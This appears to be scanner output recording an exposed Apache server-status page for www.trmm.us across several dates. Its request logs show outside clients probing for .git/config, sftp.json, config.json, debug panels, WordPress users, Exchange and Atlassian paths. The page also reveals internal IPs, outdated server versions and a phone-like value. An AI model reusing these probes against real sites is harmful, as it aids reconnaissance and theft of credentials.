0-0100440/412/925_ 140.0847600.05.589.10 127.0.0.1http/1.1 0-0100440/428/943_ 140.4019300.06.847.82 127.0.0.1http/1.1 0-0100440/404/922_ 140.1437300.02.374.09 127.0.0.1http/1.1 0-0100440/430/956_ 140.2159600.09.7111.52 127.0.0.1http/1.1 0-0100440/406/913_ 140.3836700.02.863.93 127.0.0.1http/1.1 0-0100440/388/931_ 140.5125300.02.443.35 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=2653546001142 HT 0-0100440/392/897_ 140.3925310.02.924.89 127.0.0.1http/1.1 0-0100440/415/956_ 140.1146100.05.567.47 127.0.0.1http/1.1 0-0100440/389/919_ 140.4641610.06.618.13 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/396/898_ 140.4113110.07.027.86 127.0.0.1http/1.1 0-0100440/399/919_ 140.4352110.05.176.03 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/409/939_ 140.4447610.02.463.48 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/429/945_ 140.5413110.02.213.35 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/420/944_ 140.2252110.05.927.56 127.0.0.1http/1.1 0-0100440/427/938_ 140.1341600.08.629.88 127.0.0.1http/1.1 0-0100440/404/925_ 140.4546110.02.014.11 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01148460/173/687_ 46.39000.02.386.80 96.7.74.198http/1.1trmm.us:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-01148460/183/712_ 46.3222030.01.373.61 193.35.18.77http/1.1hbroside.com:443GET / HTTP/1.1 1-01148460/191/735W 45.87000.05.017.79 96.7.74.198http/1.1trmm.us:80GET /server-status HTTP/1.1 1-01148460/177/708_ 46.268610.03.104.60 127.0.0.1http/1.1 1-01148460/188/714_ 45.9321910.03.085.85 193.35.18.77http/1.1 1-01148460/181/708_ 46.2210100.03.316.98 168.143.243.15http/1.1 1-01148460/175/694_ 45.3810110.01.575.14 168.143.243.15http/1.1 1-01148460/179/733_ 46.024600.00.534.91 127.0.0.1http/1.1 1-01148460/184/718_ 46.3123610.01.393.59 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01148460/195/686_ 46.38000.00.632.21 96.7.74.198http/1.1trmm.us:80GET /.vscode/sftp.json HTTP/1.1 1-01148460/175/695_ 43.6841190.03.215.20 127.0.0.1http/1.1 1-01148460/187/707_ 46.38000.00.675.76 96.7.74.198http/1.1trmm.us:80GET / HTTP/1.1 1-01148460/197/731_ 46.38000.02.296.35 96.7.74.198http/1.1trmm.us:80GET /about HTTP/1.1 1-01148460/176/697_ 46.374110.02.373.58 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01148460/197/716_ 46.38000.00.484.06 96.7.74.198http/1.1trmm.us:80GET /debug/default/view?panel=config HTTP/1.1 1-01148460/180/691_ 46.1824610.03.105.69 127.0.0.1http/1.1 1-01148460/185/712_ 46.39000.03.086.80 96.7.74.198http/1.1trmm.us:80GET /v2/_catalog HTTP/1.1 1-01148460/185/723_ 45.1323600.02.515.11 127.0.0.1http/1.1 2-01276550/41/573_ 3.50000.00.044.69 96.7.74.190http/1.1crm.sprout.online:443GET /telescope/requests HTTP/1.1 2-01276550/46/572_ 3.5101030.00.103.46 96.7.74.190http/1.1crm.sprout.online:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 2-01276550/33/531_ 3.41610.00.022.75 127.0.0.1http/1.1 2-01276550/40/554_ 3.4931180.00.113.80 96.7.74.135http/1.1crm.sprout.online:443GET / HTTP/1.1 2-01276550/42/546_ 3.4921110.00.105.87 96.7.74.135http/1.1crm.sprout.online:443GET / HTTP/1.1 2-01276550/38/549_ 3.49200.00.048.64 96.7.74.190http/1.1crm.sprout.online:443GET /.vscode/sftp.json HTTP/1.1 2-01276550/41/530_ 3.49200.00.045.75 96.7.74.190http/1.1crm.sprout.online:443GET /debug/default/view?panel=config HTTP/1.1 2-01276550/40/583_ 3.49200.00.032.31 96.7.74.190http/1.1crm.sprout.online:443GET /about HTTP/1.1 2-01276550/38/560_ 3.50200.00.032.53 96.7.74.190http/1.1crm.sprout.online:443GET /v2/_catalog HTTP/1.1 2-01276550/45/549_ 3.50200.00.052.26 96.7.74.190http/1.1crm.sprout.online:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-01276550/39/530_ 3.50140.00.042.19 96.7.74.190http/1.1crm.sprout.online:443GET /server-status HTTP/1.1 2-01276550/42/564_ 3.50100.00.083.21 96.7.74.190http/1.1crm.sprout.online:443GET /_all_dbs HTTP/1.1 2-01276550/38/548_ 3.50100.00.036.37 96.7.74.190http/1.1crm.sprout.online:443GET /login.action HTTP/1.1 2-01276550/43/540_ 3.50100.00.04
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ff87c597ff87c597b9c9d5ff
Apache Status Apache Server Status for www.trmm.us (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Sunday, 24-Dec-2023 05:13:16 UTC Restart Time: Tuesday, 12-Dec-2023 17:48:21 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 11 days 11 hours 24 minutes 55 seconds Server load: 0.00 0.00 0.06 Total accesses: 267398 - Total Traffic: 15.3 GB CPU Usage: u578.53 s102.61 cu0 cs0 - .0687% CPU load .27 requests/sec - 16.2 kB/second - 59.9 kB/request 1 requests currently being processed, 179 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 010044no0yes018000 1114846no0yes018000 2127655no0yes018000 39765no1yes018010 4106151no0yes018000 5123272no0yes018000 619783no1yes117010 79491no0yes018000 85337no0yes018000 949846no0yes018000 Sum1002 1179020 ________________________________________________________________ ______________________________________________W_________________ ____________________________________________________............ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0100440/422/949_ 139.1622210.07.2832.85 127.0.0.1http/1.1 0-0100440/410/940_ 139.3442300.03.804.86 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=2649403196209 HT 0-0100440/410/923_ 139.3832710.05.589.10 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/423/938_ 139.1942300.06.837.81 127.0.0.1http/1.1 0-0100440/402/920_ 139.4218300.02.374.09 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=2649643367232 HT 0-0100440/427/953_ 139.3636300.09.7111.52 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=2649463212128 HT 0-0100440/401/908_ 139.1718300.02.863.93 127.0.0.1http/1.1 0-0100440/385/928_ 139.454210.02.443.35 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/387/892_ 139.184210.02.924.89 127.0.0.1http/1.1 0-0100440/413/954_ 139.3830300.05.557.47 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=2649523272267 HT 0-0100440/383/913_ 139.1530300.06.618.12 127.0.0.1http/1.1 0-0100440/391/893_ 139.2038700.07.017.86 127.0.0.1http/1.1 0-0100440/395/915_ 139.2136310.05.166.02 127.0.0.1http/1.1 0-0100440/405/935_ 139.2235700.02.463.48 127.0.0.1http/1.1 0-0100440/425/941_ 139.3638710.02.213.35 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/416/940_ 139.3635710.05.917.55 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/425/936_ 139.4022210.08.629.88 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/398/919_ 139.2632700.02.004.10 127.0.0.1http/1.1 1-01148460/170/684_ 45.1159100.02.376.80 135.125.246.110http/1.1localhost:80POST / HTTP/1.1 1-01148460/180/709_ 44.9751310.01.363.60 128.199.213.167http/1.1 1-01148460/189/733_ 44.9259110.05.017.79 135.125.246.110http/1.1 1-01148460/174/705_ 43.8134210.03.094.59 127.0.0.1http/1.1 1-01148460/187/713_ 45.1351100.03.085.85 128.199.213.167http/1.1localhost:80GET /bundle.js HTTP/1.1 1-01148460/178/705_ 45.1834210.03.296.97 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01148460/174/693_ 44.9951010.01.575.14 128.199.213.167http/1.1 1-01148460/177/731_ 45.2314910.00.524.91 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01148460/181/715_ 44.9252310.01.393.58 127.0.0.1http/1.1 1-01148460/193/684_ 45.0870210.00.632.21 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01148460/175/695_ 43.68857190.03.215.20 96.7.74.190http/1.1 1-01148460/182/702_ 45.0579000.00.675.75 47.128.123.38http/1.1trmm.us:443GET / HTTP/1.1 1-01148460/194/728_ 44.2470210.02.286.35 127.0.0.1http/1.1 1-01148460/173/694_ 44.8114910.02.363.58 127.0.0.1http/1.1 1-01148460/193/712_ 45.0966300.00.474.05 127.0.0.1http/1.1localhost:443GET /dynatraceApacheQueuingTimeCheck?timestamp=2649163048325 HT 1-01148460/178/689_ 45.135241330.03.105.69 23.205.108.88http/1.1trmm.us:443GET /public/mms/20231003_155400_UTC_6f3f0ab561_0.png HTTP/1.1 1-01148460/181/708_ 44.9166310.03.076.80 127.0.0.1http/1.1 1-01148460/185/723_ 45.1351300.02.515.11 128.199.213.167http/1.1localhost:80GET /upl.php HTTP/1.1 2-01276550/18/550_ 1.837410.00.024.67 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01276550/26/552_ 1.797410.00.023.38 127.0.0.1http/1.1 2-01276550/15/513_ 1.846200.00.012.73 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=2649763457956 HT 2-01276550/22/536_ 1.806210.00.023.72 127.0.0.1http/1.1 2-01276550/20/524_ 1.844410.00.025.79 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01276550/19/530_ 1.814410.00.028.62 127.0.0.1http/1.1 2-01276550/20/509_ 1.852910.00.015.72 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01276550/20/563_ 1.812910.00.012.29 127.0.0.1http/1.1 2-01276550/22/544_ 1.852710.00.022.52 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01276550/20/524_ 1.812700.00.012.23 127.0.0.1http/1.1 2-01276550/22/513_ 1.861410.00.022.17 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01276550/21/543_ 1.821410.00.053.18 127.0.0.1http/1.1 2-01276550/19/529_ 1.861210.00.016.35 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01276550/22/519_ 1.821210.00.022.32 127.0.0.1http/1.1 2-01276550/25/509_ 1.87200.0</
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ff87c597ff87c597f61737da
Apache Status Apache Server Status for www.trmm.us (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Tuesday, 12-Dec-2023 18:05:08 UTC Restart Time: Tuesday, 12-Dec-2023 17:48:21 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 16 minutes 47 seconds Server load: 1.12 0.80 0.33 Total accesses: 555 - Total Traffic: 7.4 MB CPU Usage: u4.77 s.56 cu0 cs0 - .529% CPU load .551 requests/sec - 7.5 kB/second - 13.7 kB/request 3 requests currently being processed, 177 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0105929no0yes018000 1105930no0yes018000 2105935no0yes018000 3105950no1yes018010 4105973no0yes018000 5106002no0yes117000 6106024no0yes018000 7106043no3yes018030 8106065no3yes216020 9107415no0yes018000 Sum1007 3177060 ________________________________________________________________ ______________________________________R_________________________ ________________W__________W________________________............ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-01059290/1/1_ 0.0016990.00.000.00 127.0.0.1http/1.1 0-01059290/2/2_ 0.2516600.00.000.00 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=1659171652209 HT 0-01059290/1/1_ 0.0516610.00.000.00 127.0.0.1http/1.1 0-01059290/2/2_ 0.279410.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-01059290/1/1_ 0.059400.00.000.00 127.0.0.1http/1.1 0-01059290/1/1_ 0.15300.00.000.00 168.143.243.15http/1.1 0-01059290/2/2_ 0.16100.00.000.00 168.143.243.26http/1.1 0-01059290/2/2_ 0.1745410.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-01059290/2/2_ 0.1934600.00.000.00 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=1658991508186 HT 0-01059290/1/1_ 0.0825600.00.000.00 127.0.0.1http/1.1 0-01059290/1/1_ 0.2322600.00.000.00 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=1659111594735 HT 0-01059290/1/1_ 0.0922600.00.000.00 127.0.0.1http/1.1 0-01059290/1/1_ 0.2516910.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01059300/1/1_ 0.05823620.00.020.02 65.211.109.20http/1.1veew.info:443GET /?1XJ&phn=6178693528 HTTP/1.1 1-01059300/1/1_ 0.058232170.00.000.00 65.211.109.20http/1.1veew.info:443POST /ajax.php HTTP/1.1 1-01059300/1/1_ 0.1257900.00.000.00 217.34.133.56http/1.1rewurds.info:80GET /wp-login.php HTTP/1.1 1-01059300/1/1_ 0.1742410.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01059300/1/1_ 0.19367110.00.040.04 99.32.168.66http/1.1veew.info:443GET /js/jquery.min.js HTTP/1.1 1-01059300/1/1_ 0.2613480.00.000.00 96.7.74.198http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 2-01059350/1/1_ 0.03380.00.000.00 168.143.243.31http/1.1 2-01059350/1/1_ 0.04290.00.000.00 168.143.243.26http/1.1 2-01059350/1/1_ 0.06210.00.000.00 168.143.243.30http/1.1 2-01059350/1/1_ 0.14210.00.000.00 168.143.243.26http/1.1 2-01059350/1/1_ 0.18210.00.000.00 168.143.243.30http/1.1 2-01059350/1/1_ 0.18110.00.000.00 168.143.243.30http/1.1 2-01059350/1/1_ 0.22010.00.000.00 168.143.243.26http/1.1 2-01059350/1/1_ 0.2611810.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 3-01059500/3/3_ 0.34100.00.080.08 168.143.243.26http/1.1trmm.us:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 3-01059500/2/2_ 0.18190.00.000.00 168.143.243.26http/1.1 3-01059500/2/2_ 0.33100.00.010.01 168.143.243.26http/1.1 3-01059500/3/3_ 0.33100.00.010.01 168.143.243.30http/1.1 3-01059500/2/2_ 0.33100.00.070.07 168.143.243.30http/1.1 3-01059500/1/1_ 0.23080.00.010.01 168.143.243.26http/1.1 3-01059500/3/3_ 0.34200.00.010.01 168.143.243.26http/1.1trmm.us:443GET /.git/config HTTP/1.1 3-01059500/2/2_ 0.34200.00.000.00 168.143.243.26http/1.1trmm.us:443GET /s/333323e22343e23353e23323/_/;/META-INF/maven/com.atlassia 3-01059500/3/3_ 0.34100.00.000.00 168.143.243.26http/1.1trmm.us:443GET /s/0383e23343e23353e23323/_/;/META-INF/maven/com.atlassian. 3-01059500/1/1_ 0.34100.00.000.00 168.143.243.26http/1.1trmm.us:443GET /config.json HTTP/1.1 3-01059500/3/3_ 0.34100.00.000.00 168.143.243.26http/1.1trmm.us:443GET /config.json HTTP/1.1 3-01059500/3/3_ 0.34100.00.080.08 168.143.243.26http/1.1trmm.us:443GET /telescope/requests HTTP/1.1 3-01059500/3/3_ 0.34100.00.000.00 168.143.243.26http/1.1trmm.us:443GET /telescope/requests HTTP/1.1 3-01059500/2/2_ 0.32100.00.000.00 168.143.243.30http/1.1 3-01059500/2/2_ 0.34100.00.000.00 168.143.243.26http/1.1trmm.us:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 3-01059500/1/1_ 0.18180.00.000.00 168.143.243.26http/1.1 4-01059730/2/2_ 0.20000.00.010.01 168.143.243.26http/1.1 4-01059730/2/2_ 0.20100.00.010.01 168.143.243.30http/1.1 4-01059730/1/1_ 0.20100.00.000.00 168.143.243.30http/1.1 4-01059730/1/1_ 0.21100.00.000.00 168.143.243.30http/1.1 4-01059730/2/2_ 0.21100.00.000.00 168.143.243.30http/1.1 4-01059730/2/2_ 0.21100.00.000.00 168.143.243.26http/1.1 4-01059730/1/1_ 0.21100.00.000.00 168.143.243.30http/1.1 4-01059730/2/2_ 0.21000.00.000.00 168.143.243.26http/1.1 4-01059730/2/2_ 0.21090.00.070.07 168.143.243.30http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ff87c597ff87c59724cfd0ee
Apache Status Apache Server Status for www.trmm.us (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Tuesday, 12-Dec-2023 18:05:08 UTC Restart Time: Tuesday, 12-Dec-2023 17:48:21 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 16 minutes 47 seconds Server load: 1.12 0.80 0.33 Total accesses: 543 - Total Traffic: 7.4 MB CPU Usage: u4.73 s.55 cu0 cs0 - .524% CPU load .539 requests/sec - 7.5 kB/second - 13.9 kB/request 2 requests currently being processed, 178 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0105929no0yes018000 1105930no0yes018000 2105935no0yes018000 3105950no1yes018010 4105973no1yes018000 5106002no0yes018000 6106024no0yes018000 7106043no3yes018030 8106065no4yes216030 9107415no0yes018000 Sum1009 2178070 ________________________________________________________________ ________________________________________________________________ ________________WR__________________________________............ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-01059290/1/1_ 0.0016990.00.000.00 127.0.0.1http/1.1 0-01059290/2/2_ 0.2516600.00.000.00 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=1659171652209 HT 0-01059290/1/1_ 0.0516610.00.000.00 127.0.0.1http/1.1 0-01059290/2/2_ 0.279410.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-01059290/1/1_ 0.059400.00.000.00 127.0.0.1http/1.1 0-01059290/1/1_ 0.15300.00.000.00 168.143.243.15http/1.1 0-01059290/2/2_ 0.16100.00.000.00 168.143.243.26http/1.1 0-01059290/2/2_ 0.1745410.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-01059290/2/2_ 0.1934600.00.000.00 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=1658991508186 HT 0-01059290/1/1_ 0.0825600.00.000.00 127.0.0.1http/1.1 0-01059290/1/1_ 0.2322600.00.000.00 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=1659111594735 HT 0-01059290/1/1_ 0.0922600.00.000.00 127.0.0.1http/1.1 0-01059290/1/1_ 0.2516910.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01059300/1/1_ 0.05823620.00.020.02 65.211.109.20http/1.1veew.info:443GET /?1XJ&phn=6178693528 HTTP/1.1 1-01059300/1/1_ 0.058232170.00.000.00 65.211.109.20http/1.1veew.info:443POST /ajax.php HTTP/1.1 1-01059300/1/1_ 0.1257900.00.000.00 217.34.133.56http/1.1rewurds.info:80GET /wp-login.php HTTP/1.1 1-01059300/1/1_ 0.1742410.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01059300/1/1_ 0.19367110.00.040.04 99.32.168.66http/1.1veew.info:443GET /js/jquery.min.js HTTP/1.1 1-01059300/1/1_ 0.2613480.00.000.00 96.7.74.198http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 2-01059350/1/1_ 0.03380.00.000.00 168.143.243.31http/1.1 2-01059350/1/1_ 0.04290.00.000.00 168.143.243.26http/1.1 2-01059350/1/1_ 0.06210.00.000.00 168.143.243.30http/1.1 2-01059350/1/1_ 0.14210.00.000.00 168.143.243.26http/1.1 2-01059350/1/1_ 0.18110.00.000.00 168.143.243.30http/1.1 2-01059350/1/1_ 0.18110.00.000.00 168.143.243.30http/1.1 2-01059350/1/1_ 0.22010.00.000.00 168.143.243.26http/1.1 2-01059350/1/1_ 0.2611810.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 3-01059500/3/3_ 0.34100.00.080.08 168.143.243.26http/1.1trmm.us:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 3-01059500/2/2_ 0.18190.00.000.00 168.143.243.26http/1.1 3-01059500/2/2_ 0.33100.00.010.01 168.143.243.26http/1.1 3-01059500/3/3_ 0.33000.00.010.01 168.143.243.30http/1.1 3-01059500/2/2_ 0.33000.00.070.07 168.143.243.30http/1.1 3-01059500/1/1_ 0.23080.00.010.01 168.143.243.26http/1.1 3-01059500/3/3_ 0.34100.00.010.01 168.143.243.26http/1.1trmm.us:443GET /.git/config HTTP/1.1 3-01059500/2/2_ 0.34100.00.000.00 168.143.243.26http/1.1trmm.us:443GET /s/333323e22343e23353e23323/_/;/META-INF/maven/com.atlassia 3-01059500/3/3_ 0.34100.00.000.00 168.143.243.26http/1.1trmm.us:443GET /s/0383e23343e23353e23323/_/;/META-INF/maven/com.atlassian. 3-01059500/1/1_ 0.34100.00.000.00 168.143.243.26http/1.1trmm.us:443GET /config.json HTTP/1.1 3-01059500/3/3_ 0.34100.00.000.00 168.143.243.26http/1.1trmm.us:443GET /config.json HTTP/1.1 3-01059500/3/3_ 0.34100.00.080.08 168.143.243.26http/1.1trmm.us:443GET /telescope/requests HTTP/1.1 3-01059500/3/3_ 0.34100.00.000.00 168.143.243.26http/1.1trmm.us:443GET /telescope/requests HTTP/1.1 3-01059500/2/2_ 0.32100.00.000.00 168.143.243.30http/1.1 3-01059500/2/2_ 0.34100.00.000.00 168.143.243.26http/1.1trmm.us:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 3-01059500/1/1_ 0.18180.00.000.00 168.143.243.26http/1.1 4-01059730/2/2_ 0.20100.00.010.01 168.143.243.26http/1.1 4-01059730/2/2_ 0.20100.00.010.01 168.143.243.30http/1.1 4-01059730/1/1_ 0.20100.00.000.00 168.143.243.30http/1.1 4-01059730/1/1_ 0.21100.00.000.00 168.143.243.30http/1.1 4-01059730/2/2_ 0.21100.00.000.00 168.143.243.30http/1.1 4-01059730/2/2_ 0.21100.00.000.00 168.143.243.26http/1.1 4-01059730/1/1_ 0.21000.00.000.00 168.143.243.30http/1.1 4-01059730/2/2_ 0.21000.00.000.00 168.143.243.26http/1.1 4-01059730/2/2_ 0.21090.00.070.07 168.143.243.30http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ff87c597ff87c5973b551b25
Apache Status Apache Server Status for www.trmm.us (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Monday, 19-Jun-2023 14:41:30 UTC Restart Time: Monday, 12-Jun-2023 11:39:44 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 7 days 3 hours 1 minute 46 seconds Server load: 0.30 0.26 0.15 Total accesses: 863229 - Total Traffic: 13.4 GB CPU Usage: u768.87 s184.11 cu0 cs0 - .155% CPU load 1.4 requests/sec - 22.8 kB/second - 16.3 kB/request 4 requests currently being processed, 176 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 011301no0yes018000 19522no0yes018000 2122076no0yes018000 324195no8yes216050 421293no1yes018010 582938no2yes018020 6113967no0yes018000 794980no1yes117000 9107391no0yes018000 11114344no1yes117000 Sum10013 4176080 ______________________________________________________W_________ _____W__________________________________________________________ W_______________..................__________________............ ......_W________________........................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0113010/317/4598_ 52.00200.04.3448.55 168.143.243.30http/1.1 0-0113010/317/4621_ 52.0529210.03.4748.43 23.205.108.80http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0113010/306/4627_ 51.235180.02.1544.19 168.143.243.31http/1.1 0-0113010/327/4663_ 52.00200.02.2846.17 168.143.243.26http/1.1 0-0113010/322/4644_ 52.0627130.04.6562.66 23.205.108.69http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0113010/314/4574_ 51.755160.01.4142.44 168.143.243.15http/1.1 0-0113010/300/4566_ 52.0951230.01.3650.23 168.143.243.31http/1.1crm.sprout.online:443GET / HTTP/1.1 0-0113010/310/4575_ 52.017300.03.6162.27 23.205.108.80http/1.1crm.textripple.com:443GET /mods/js/mod-tools-forward-1.0.js HTTP/1.1 0-0113010/311/4566_ 52.1151220.01.5655.62 168.143.243.31http/1.1crm.sprout.online:443GET / HTTP/1.1 0-0113010/322/4636_ 51.9851290.01.2959.97 168.143.243.31http/1.1 0-0113010/312/4641_ 52.1051190.08.2355.58 168.143.243.31http/1.1crm.sprout.online:443GET / HTTP/1.1 0-0113010/315/4596_ 51.8967160.01.8545.26 96.7.74.180http/1.1 0-0113010/320/4659_ 51.98500.03.1047.30 168.143.243.31http/1.1 0-0113010/314/4611_ 52.01040.02.3335.63 168.143.243.30http/1.1 0-0113010/329/4647_ 52.004120.06.4653.03 168.143.243.26http/1.1 0-0113010/320/4679_ 52.0438140.05.7158.77 96.7.74.180http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0113010/319/4612_ 52.00160.04.7361.05 168.143.243.30http/1.1 0-0113010/312/4585_ 51.932874480.03.2143.38 23.205.108.88http/1.1 1-095220/205/2850_ 21.57190.01.0032.88 168.143.243.26http/1.1 1-095220/208/2791_ 21.760140.01.1838.56 168.143.243.26http/1.1 1-095220/208/2823_ 21.760150.01.1132.33 168.143.243.26http/1.1 1-095220/200/2775_ 21.57180.02.6233.41 168.143.243.30http/1.1 1-095220/205/2756_ 21.7601650.01.4824.13 168.143.243.26http/1.1 1-095220/213/2821_ 21.61000.01.5828.78 168.143.243.26http/1.1 1-095220/220/2830_ 21.710110.01.6523.57 168.143.243.26http/1.1 1-095220/199/2810_ 21.57100.03.9835.41 168.143.243.26http/1.1 1-095220/206/2840_ 21.760150.01.4531.69 168.143.243.26http/1.1 1-095220/203/2806_ 21.750160.04.0043.00 168.143.243.30http/1.1 1-095220/210/2816_ 21.71020.01.4037.52 168.143.243.30http/1.1 1-095220/199/2793_ 21.750110.08.4739.67 168.143.243.30http/1.1 1-095220/201/2796_ 21.57190.01.0030.80 168.143.243.30http/1.1 1-095220/207/2780_ 21.740103440.05.3646.10 168.143.243.30http/1.1 1-095220/203/2809_ 21.62000.04.2546.81 168.143.243.30http/1.1 1-095220/204/2789_ 21.741150.02.2841.49 168.143.243.30http/1.1 1-095220/204/2834_ 21.760140.05.5436.71 168.143.243.30http/1.1 1-095220/210/2812_ 21.63120.01.2425.84 168.143.243.26http/1.1 2-01220760/394/3123_ 42.98510.05.0330.70 168.143.243.15http/1.1 2-01220760/389/3077_ 42.9751220.05.7654.00 168.143.243.31http/1.1 2-01220760/391/3057_ 42.99360.05.5535.73 168.143.243.30http/1.1 2-01220760/380/3028_ 42.89221910.03.0425.00 168.143.243.30http/1.1 2-01220760/385/3058_ 42.985330.03.7826.24 168.143.243.15http/1.1 2-01220760/404/3088_ 42.901750.03.7921.42 168.143.243.30http/1.1 2-01220760/383/3037_ 42.51500.01.9831.05 